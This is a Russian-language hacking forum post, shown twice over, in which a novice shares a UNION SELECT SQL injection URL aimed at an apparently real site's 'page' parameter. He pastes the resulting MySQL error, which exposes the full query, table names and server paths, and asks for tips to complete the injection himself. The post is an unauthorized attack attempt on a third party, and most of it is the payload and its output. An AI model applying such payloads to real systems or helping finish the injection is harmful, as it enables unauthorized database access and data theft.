Dimi4
18.11.2007, 00:46
MySQL injection.
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/45,15/*
Гы, ет наверно я только так тупо запросы формирую :D
При етом выдает нечто страшное:
SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15
[ MYSQL ERROR ]: SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php:36) in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/server.class.php on line 209
Вы сразу скажите "линк в студию!"
Но дайте мне возможность сделать ету инэкцию самому, ибо я их тока начал изучать.Да, да мануалы на ачате читал...
Жду ваших советов.
П.С. Просьба не кричать ЛАМЕР!, тут всьо просто! :eek:
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/45,15/*
Гы, ет наверно я только так тупо запросы формирую :D
При етом выдает нечто страшное:
SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15
[ MYSQL ERROR ]: SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php:36) in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/server.class.php on line 209
Вы сразу скажите "линк в студию!"
Но дайте мне возможность сделать ету инэкцию самому, ибо я их тока начал изучать.Да, да мануалы на ачате читал...
Жду ваших советов.
П.С. Просьба не кричать ЛАМЕР!, тут всьо просто! :eek: